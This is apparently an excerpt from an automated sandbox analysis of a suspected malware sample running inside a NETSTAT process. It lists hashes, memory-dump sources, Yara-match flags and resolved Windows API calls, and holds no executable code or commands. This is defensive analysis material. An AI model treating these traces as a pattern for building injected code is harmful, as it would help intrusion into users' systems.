                                          • Instruction ID: 994be71c8b0daf8539bd08d373df5f2bb3f6cf1d4f70e955ec0299d52d34aba7
                                          • Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                          • Instruction Fuzzy Hash: 25D01772240214ABD710EB98DC89E977BACEF48760F114599BA4D5B282D630FA008BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00BD725E,00000206,?,00BD725E,00000005,FFFFFFFF), ref: 00BDC8C5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction ID: 12c6cf97fe5b5ebe3b0a2a7ebff2fb4bf34aa36adbf97b393f4b0ba105b76183
                                          • Opcode Fuzzy Hash: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction Fuzzy Hash: 2AE0C2A64093C04FC721EB7894C008ABF54DF9212872555CFE4955B643D161A216DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9d45e6be7bcc92973fc648254fd6195200d9e85fe01b76170155d128317054c8
                                          • Instruction ID: 49fa7feb8bd96f22d0a5e68e65f4aa52752d77b7b3fd297f515b547d1b97f59a
                                          • Opcode Fuzzy Hash: 9d45e6be7bcc92973fc648254fd6195200d9e85fe01b76170155d128317054c8
                                          • Instruction Fuzzy Hash: D290026135185446D204A5695C14B170095A7D0383F51C115A4184555CCA5588616561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 426d38a08e29e15eeec1bd86ee8fbe101b15e9198ab075dd784cd807b07ee50e
                                          • Instruction ID: 74da9bbd58f7d8a267b6a6ff0b603690da84a7cd1a59a19db258123ac77a6969
                                          • Opcode Fuzzy Hash: 426d38a08e29e15eeec1bd86ee8fbe101b15e9198ab075dd784cd807b07ee50e
                                          • Instruction Fuzzy Hash: CC9002B134105806D144B15954047560095A7D0381F51C011A9094555E87998DD576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 35572add0927ad9653a16dbca3cca8862b761d550a98de1c92f2b5cfdbf0c159
                                          • Instruction ID: ead3be871cfc7256eba5a74f0d8a98abb168da275a4cb82ff551e6ca702e92d5
                                          • Opcode Fuzzy Hash: 35572add0927ad9653a16dbca3cca8862b761d550a98de1c92f2b5cfdbf0c159
                                          • Instruction Fuzzy Hash: EC9002A138105846D104A1595414B160095E7E1381F51C015E5094555D8759CC527166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e3df0c490e2e50265baefcdba811b6893c87bc3ed6a1fbeeb47eff6acebefe56
                                          • Instruction ID: d8234940cbbdf8265f68fc4fac53d3efa7696fafcac7df240b183a8ba77e9020
                                          • Opcode Fuzzy Hash: e3df0c490e2e50265baefcdba811b6893c87bc3ed6a1fbeeb47eff6acebefe56
                                          • Instruction Fuzzy Hash: 1B900261382095565549F15954045174096B7E02C1791C012A5444951C86669856E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e872d369cfd2e48792e45115788944a36dcc5389200032b09e339864100e2c3a
                                          • Instruction ID: 5e9ef17f3c4c359a183b5eb836cb5a517f4d3cd2a3ccec0ef1a757458bbdae36
                                          • Opcode Fuzzy Hash: e872d369cfd2e48792e45115788944a36dcc5389200032b09e339864100e2c3a
                                          • Instruction Fuzzy Hash: AC90027134105817D115A15955047170099A7D02C1F91C412A4454559D97968952B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 48848db3e3d363dca3d764388d7b3f542f3b61c062784c17745e72a0b11eee43
                                          • Instruction ID: 187378f7541ba05ed339dfc6b2a0d8d254e36c777f449a4d68ab8067b99de979
                                          • Opcode Fuzzy Hash: 48848db3e3d363dca3d764388d7b3f542f3b61c062784c17745e72a0b11eee43
                                          • Instruction Fuzzy Hash: 3A90027134105806D104A59964086560095A7E0381F51D011A9054556EC7A588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c97e8318649d4cb798070315350140600c2e9fbc7b05583bf175ff017829a674
                                          • Instruction ID: 61ab88816a8da4a430b19ed8218796edf6e427d4bd0e23f6be18f44697fc4233
                                          • Opcode Fuzzy Hash: c97e8318649d4cb798070315350140600c2e9fbc7b05583bf175ff017829a674
                                          • Instruction Fuzzy Hash: CA90027135119806D114A15994047160095A7D1281F51C411A4854559D87D588917162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c2b8556ea47ff71473e909a6efebe47fbc95c51b67fece74fe5d9e3bf4412157
                                          • Instruction ID: 55fd8d4cb1687dff9bc202b238b4340e57562cca621b9efb7d1b5d82b86d2566
                                          • Opcode Fuzzy Hash: c2b8556ea47ff71473e909a6efebe47fbc95c51b67fece74fe5d9e3bf4412157
                                          • Instruction Fuzzy Hash: 0E90026935305406D184B159640861A0095A7D1282F91D415A4045559CCA5588696361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ac8b9fd2696ba41590c3ca388febf67a2b501460f8f5ddb1474fc6216f270925
                                          • Instruction ID: 52ca170ef696487f07c7c1a801de1d049e4446894e4aca1ad8afacd1c9085f85
                                          • Opcode Fuzzy Hash: ac8b9fd2696ba41590c3ca388febf67a2b501460f8f5ddb1474fc6216f270925
                                          • Instruction Fuzzy Hash: 6590027134509C46D144B1595404A5600A5A7D0385F51C011A4094695D97658D55B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6dd98c5a782eaa8fa09cd5134ce2e0409aab0c1b5dd423ecbecbdf033c4efe13
                                          • Instruction ID: 01948727bf2aac32d3891619e1fee625ef4957c733fda2a53b82b93dedb77db4
                                          • Opcode Fuzzy Hash: 6dd98c5a782eaa8fa09cd5134ce2e0409aab0c1b5dd423ecbecbdf033c4efe13
                                          • Instruction Fuzzy Hash: 7890027134105C06D184B159540465A0095A7D1381F91C015A4055655DCB558A5977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 99b1aee2be0f97aa29f4b3e030b6730723916d3d0161d1d994175e2858dcb4e5
                                          • Instruction ID: 8db58ddbb3c33cae2d21b0ba88ee5553007fded08cbfb4b58347650587679d9b
                                          • Opcode Fuzzy Hash: 99b1aee2be0f97aa29f4b3e030b6730723916d3d0161d1d994175e2858dcb4e5
                                          • Instruction Fuzzy Hash: 5890027174505C06D154B15954147560095A7D0381F51C011A4054655D87958A5576E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f2fb2b8b10c65e95bfb1dbd02aa8a8a8d121970ffe637c8f8e8b0e4f2fdeff66
                                          • Instruction ID: c881fab0075559caf482b155e59d390f5e6570f3f9162e9dc2eabe2c26074ec7
                                          • Opcode Fuzzy Hash: f2fb2b8b10c65e95bfb1dbd02aa8a8a8d121970ffe637c8f8e8b0e4f2fdeff66
                                          • Instruction Fuzzy Hash: 6A90027134105C46D104A1595404B560095A7E0381F51C016A4154655D8755C8517561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5c76ff35e13206591bd78b4f630b8b4a9617210ec4cc09e03bd3b2acd2d24232
                                          • Instruction ID: d76541c20bfe4674c0830a0b850f67e6aba33e3f110bd0ccddd68cab48bf0f35
                                          • Opcode Fuzzy Hash: 5c76ff35e13206591bd78b4f630b8b4a9617210ec4cc09e03bd3b2acd2d24232
                                          • Instruction Fuzzy Hash: E69002713410DC06D114A159940475A0095A7D0381F55C411A8454659D87D588917161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5f2934dbd6ca5cb48a4a4f7280cd80fa2c1f4f35e0d93de003755769ea82008f
                                          • Instruction ID: 54685d112781d14d6232e78ec89d99e66c178805a4b59673c2517636b985145e
                                          • Opcode Fuzzy Hash: 5f2934dbd6ca5cb48a4a4f7280cd80fa2c1f4f35e0d93de003755769ea82008f
                                          • Instruction Fuzzy Hash: E290047535105407010DF55D170451700D7F7D53D1351C031F5045551CD771CC717171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4f3bffa4173b43f486683b17bca535ccf5b16aa7c747424120e61cd76ad8d95d
                                          • Instruction ID: 5cc5766123766a0c5e37682c275e7b2859f6e3dbbce4c71e1fffdd2828d17958
                                          • Opcode Fuzzy Hash: 4f3bffa4173b43f486683b17bca535ccf5b16aa7c747424120e61cd76ad8d95d
                                          • Instruction Fuzzy Hash: 32900265361054060149E559160451B04D5B7D63D1391C015F5446591CC76188656361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 43ee8c6d6b364e0d4ccdb099ba72cba01ffdc0bc700ecea3f42ecbd5a5e1ce03
                                          • Instruction ID: 5a52a7ed0e0370b3b475e9459d9d609a5ddcd687d5e1c050917352559f9f31c5
                                          • Opcode Fuzzy Hash: 43ee8c6d6b364e0d4ccdb099ba72cba01ffdc0bc700ecea3f42ecbd5a5e1ce03
                                          • Instruction Fuzzy Hash: 4F9002A1342054074109B1595414626409AA7E0281B51C021E5044591DC66588917165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 074c2036f3219a81dd98b9a0addef7e65102c2b696b389c22f915089b33be9f1
                                          • Instruction ID: 245f7df2d658b8a2cec973487fe27942cdbca14ffa51226a49eb32fe37a84e08
                                          • Opcode Fuzzy Hash: 074c2036f3219a81dd98b9a0addef7e65102c2b696b389c22f915089b33be9f1
                                          • Instruction Fuzzy Hash: 30A185B1D00209ABDB14EFA4CC42FEEB7F8EF44304F0445AEF515A7241EB71AA458BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: f37971a2c6a773b79855d8f13411a2433f0c5456e05823e448818ddc1d1afd3e
                                          • Instruction ID: 8eeb7323835e5756008008ba12acb5a42646564aae301db209193404e8aa6f76
                                          • Opcode Fuzzy Hash: f37971a2c6a773b79855d8f13411a2433f0c5456e05823e448818ddc1d1afd3e
                                          • Instruction Fuzzy Hash: 0971C2B1D00219AADB24EBA4CC42FEEB7F8EF44304F0445DEF51966241EB71AA45CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00BDB4FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: d7824cc38a024672265e3aa1ed98203d4ad0329e2fd8da2843ae6dba6c17353a
                                          • Instruction ID: f62743e135112beabbc9ea4ab61883374636ab7b4bd1f3ee209480bad7a15443
                                          • Opcode Fuzzy Hash: d7824cc38a024672265e3aa1ed98203d4ad0329e2fd8da2843ae6dba6c17353a
                                          • Instruction Fuzzy Hash: 48319EB5600604ABC724DFA8D8C1FABF7F8EB88704F10815EE65E5B345E770A544CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00BDB4FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: b79dafcaa63ab5027b96cb7ccf62ec471a25b7b3e045617eb2114c4fbdb2149b
                                          • Instruction ID: 8f78d363ee49fb32a5ef94b8366d47b32ff7dd47eaf2ab781778cedc904c108b
                                          • Opcode Fuzzy Hash: b79dafcaa63ab5027b96cb7ccf62ec471a25b7b3e045617eb2114c4fbdb2149b
                                          • Instruction Fuzzy Hash: 9731C4B1A00600ABC714DF64D8C1FAAFBF8EB48704F14819EEA595B346E7706554CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00BD4D47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 68d33d362902243586190b310a5ede7d4c4809b5e4e438ba107da72a504fbc6c
                                          • Instruction ID: 8290b8a37866f330d68286bdd9b9856187da9ce8b3da933c800a45310d810a96
                                          • Opcode Fuzzy Hash: 68d33d362902243586190b310a5ede7d4c4809b5e4e438ba107da72a504fbc6c
                                          • Instruction Fuzzy Hash: AD316375A0020AAFCB04DFD8D8809EFB7B9FF48304B108599E515EB354E771EE058BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00BD4D47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 68acf39488a1566cf0686f83f46ac049d2e3d485f685d97833a5de9528773939
                                          • Instruction ID: b8ecc6a5674da878728e0c158f9212a1726a16fe181b84fd5605838b7cd4eb70
                                          • Opcode Fuzzy Hash: 68acf39488a1566cf0686f83f46ac049d2e3d485f685d97833a5de9528773939
                                          • Instruction Fuzzy Hash: 2A313275A0020AAFDB00DFD8D8809EFB7B9FF88304B108599E515EB314E775EE058BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00BC76BA
                                          • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00BC76DB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 0de3faa4af71b190035b40812e920cf22ad6d4533d41ba8f7304673b02ec721f
                                          • Instruction ID: 43b77d9dcc0a58ce0a1f321a62457a31a9afaf1642961c2dd2ac7fba6bf16486
                                          • Opcode Fuzzy Hash: 0de3faa4af71b190035b40812e920cf22ad6d4533d41ba8f7304673b02ec721f
                                          • Instruction Fuzzy Hash: 4701A731A8022877E721A6948C43FFE77AC9B41B50F040159FF04BA2C1FA94B90647EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 00BCF8D8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 6fcacd8bc34b3f417b9f857ebc6c4e00a5b627cd3df4932bec3b6410d36bda2f
                                          • Instruction ID: 8a73a65b1687c50abe65b11cbd153cfdf144abc90f273dcbcd9ce3ee667afa18
                                          • Opcode Fuzzy Hash: 6fcacd8bc34b3f417b9f857ebc6c4e00a5b627cd3df4932bec3b6410d36bda2f
                                          • Instruction Fuzzy Hash: 535165B65102146BD725EB64CC85FEBB3BCEF48300F0446DAB6695B152FE30EB858B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 00BCF8D8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 4b2dea59289ab21ff06fe6cd5d3ffbb1c69e645c67548c293b04a01ad4820636
                                          • Instruction ID: a4de65ac85829094a074364e573e7f95ff2856b8b715b63321da0967d16451d9
                                          • Opcode Fuzzy Hash: 4b2dea59289ab21ff06fe6cd5d3ffbb1c69e645c67548c293b04a01ad4820636
                                          • Instruction Fuzzy Hash: BE5167B65102046BD725EB64CC85FEBB3BCEF48300F0446DDB6695B252FA30E6858B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00BD6A16,?,00BD71BD,00BD71BD,?,00BD6A16,?,?,?,?,?,00000000,00000005,00000206), ref: 00BDCA6D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 702ff153f0d53c6325599c6b7701dc2f5a5c8db231171ba56751dde1648f0977
                                          • Instruction ID: 422c07d1abdda2ea518f7ace68953f65399b9a045c8e3efa17ab0447ed27cf0c
                                          • Opcode Fuzzy Hash: 702ff153f0d53c6325599c6b7701dc2f5a5c8db231171ba56751dde1648f0977
                                          • Instruction Fuzzy Hash: 1C117CB6204108AFCB14DFA8EC80DEB77ADEF88354F118689F94C87251D630E911CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00BCAC62
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction ID: 449c0185094f7ea68f0d9c8d862834e333b5df952e7074106061e254650b2ec7
